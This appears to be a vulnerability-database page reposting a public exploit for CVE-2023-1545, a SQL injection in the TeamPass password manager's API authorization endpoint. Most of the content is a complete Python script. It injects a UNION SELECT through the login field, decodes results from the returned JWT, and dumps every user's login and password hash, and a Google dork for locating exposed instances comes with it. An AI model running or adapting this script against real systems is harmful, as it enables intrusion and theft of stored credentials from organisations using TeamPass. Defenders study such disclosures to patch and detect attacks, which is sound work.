Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

TeamPass 3.0.0.21 SQL Injection

🗓️ 24 Mar 2025 00:00:00Reported by Max MeyerType 
packetstorm
 packetstorm🔗 packetstorm.news👁 193 Views

TeamPass 3.0.0.21 has an SQL injection vulnerability affecting versions up to 2.1.24.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for SQL Injection in Teampass
24 Feb 202518:01
githubexploit
GithubExploit		Exploit for SQL Injection in Teampass
22 Sep 202500:50
githubexploit
GithubExploit		Exploit for SQL Injection in Teampass
25 Apr 202518:43
githubexploit
Huntr		SQL injection in API authorization check
15 Jan 202314:09
huntr
Circl		CVE-2023-1545
21 Mar 202313:34
circl
CNNVD		TeamPass SQL注入漏洞
21 Mar 202300:00
cnnvd
CVE		CVE-2023-1545
21 Mar 202300:00
cve
Cvelist		CVE-2023-1545 SQL Injection in nilsteampassnet/teampass
21 Mar 202300:00
cvelist
Exploit DB		TeamPass 3.0.0.21 - SQL Injection
22 Mar 202500:00
exploitdb
Github Security Blog		Teampass SQL Injection vulnerability
21 Mar 202312:30
github
Rows per page
# Exploit Title: TeamPass SQL Injection
    # Google Dork: intitle:"Teampass" + inurl:index.php?page=items
    # Date: 02/23/2025
    # Exploit Author: Max Meyer - Rivendell
    # Vendor Homepage: http://www.teampass.net
    # Software Link: https://github.com/nilsteampassnet/TeamPass
    # Version: 2.1.24 and prior
    # Tested on: Windows/Linux
    # CVE : CVE-2023-1545
    
    
    #!/usr/bin/env python3
    import sys
    import json
    import base64
    import logging
    import requests
    from typing import Optional, Dict, Any
    from dataclasses import dataclass
    
    # Configuração de logging
    logging.basicConfig(
        level=logging.INFO,
        format='%(asctime)s - %(levelname)s - %(message)s'
    )
    logger = logging.getLogger(__name__)
    
    @dataclass
    class TeamPassExploit:
        base_url: str
        arbitrary_hash: str = '$2y$10$u5S27wYJCVbaPTRiHRsx7.iImx/WxRA8/tKvWdaWQ/iDuKlIkMbhq'
        
        def __post_init__(self):
            self.vulnerable_url = f"{self.base_url}/api/index.php/authorize"
            
        def check_api_enabled(self) -> bool:
            """Verifica se a API está habilitada."""
            try:
                response = requests.get(self.vulnerable_url)
                if "API usage is not allowed" in response.text:
                    logger.error("API feature is not enabled")
                    return False
                return True
            except requests.RequestException as e:
                logger.error(f"Erro ao verificar API: {e}")
                return False
    
        def execute_sql(self, sql_query: str) -> Optional[str]:
            """Executa uma query SQL através da vulnerabilidade."""
            try:
                inject = f"none' UNION SELECT id, '{self.arbitrary_hash}', ({sql_query}), private_key, " \
                         "personal_folder, fonction_id, groupes_visibles, groupes_interdits, 'foo' " \
                         "FROM teampass_users WHERE login='admin"
                
                data = {
                    "login": inject,
                    "password": "h4ck3d",
                    "apikey": "foo"
                }
                
                response = requests.post(
                    self.vulnerable_url,
                    headers={"Content-Type": "application/json"},
                    json=data
                )
                
                if not response.ok:
                    logger.error(f"Erro na requisição: {response.status_code}")
                    return None
                    
                token = response.json().get('token')
                if not token:
                    logger.error("Token não encontrado na resposta")
                    return None
                    
                # Decodifica o token JWT
                token_parts = token.split('.')
                if len(token_parts) < 2:
                    logger.error("Token JWT inválido")
                    return None
                    
                payload = base64.b64decode(token_parts[1] + '=' * (-len(token_parts[1]) % 4))
                return json.loads(payload).get('public_key')
                
            except Exception as e:
                logger.error(f"Erro ao executar SQL: {e}")
                return None
    
        def get_user_credentials(self) -> Optional[Dict[str, str]]:
            """Obtém credenciais de todos os usuários."""
            try:
                # Obtém número total de usuários
                user_count = self.execute_sql("SELECT COUNT(*) FROM teampass_users WHERE pw != ''")
                if not user_count or not user_count.isdigit():
                    logger.error("Não foi possível obter o número de usuários")
                    return None
                    
                user_count = int(user_count)
                logger.info(f"Encontrados {user_count} usuários no sistema")
                
                credentials = {}
                for i in range(user_count):
                    username = self.execute_sql(
                        f"SELECT login FROM teampass_users WHERE pw != '' ORDER BY login ASC LIMIT {i},1"
                    )
                    password = self.execute_sql(
                        f"SELECT pw FROM teampass_users WHERE pw != '' ORDER BY login ASC LIMIT {i},1"
                    )
                    
                    if username and password:
                        credentials[username] = password
                        logger.info(f"Credenciais obtidas para: {username}")
                    
                return credentials
                
            except Exception as e:
                logger.error(f"Erro ao obter credenciais: {e}")
                return None
    
    def main():
        if len(sys.argv) < 2:
            logger.error("Usage: python3 script.py <base-url>")
            sys.exit(1)
            
        exploit = TeamPassExploit(sys.argv[1])
        
        if not exploit.check_api_enabled():
            sys.exit(1)
            
        credentials = exploit.get_user_credentials()
        if credentials:
            print("\nCredenciais encontradas:")
            for username, password in credentials.items():
                print(f"{username}: {password}")
    
    if __name__ == "__main__":
        main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Mar 2025 00:00Current
8.5High risk
Vulners AI Score8.5
CVSS 37.5
EPSS0.13984
SSVC
teampass sql injectioncve-2023-1545windows linux vulnerabilitymax meyerapi authorization exploit
193